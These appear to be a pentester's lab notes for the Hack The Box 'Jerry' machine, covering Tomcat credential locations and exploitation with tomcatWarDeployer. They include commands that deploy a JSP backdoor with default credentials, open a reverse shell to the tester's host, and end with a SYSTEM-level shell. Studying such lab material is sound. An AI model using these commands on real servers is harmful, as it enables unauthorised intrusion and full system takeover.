Password is sometimes kept:
Directory where tomcat is installed
Directory starting with tomcat in /etc/
'tomcat-users.xml'
Example: /etc/tomcat7/tomcat-users.xml
Check: cat /etc/passwd .. see where tomcat profile lives
tomcatWarDeployer
Vuln: Apache Tomcat/7.0.88
REF: JerryHTB
Example:
> python tomcatWarDeployer.py -v -x -p 4449 -H 192.168.56.102 192.168.56.100:8080
python error: no module named 'mechanize'
>> sudo apt install python-pip
>> pip install mechanize
Again with Creds:
>> sudo python ./tomcatWarDeployer.py -v -x --user=tomcat --pass=s3cret -n hello2 -p 4449 -H 10.10.14.189 10.10.10.95:8080
==== JSP Backdoor ====
INFO: JSP Backdoor up & running on http://10.10.10.95:8080/hello2/
INFO:
Happy pwning. Here take that password for web shell: '8EWh0JeCrmN0'
INFO: ------------------------------------------------------------
SUCCESS!!!!!
http://10.10.10.95:8080/hello2/
8EWh0JeCrmN0
> whoami
nt authority\system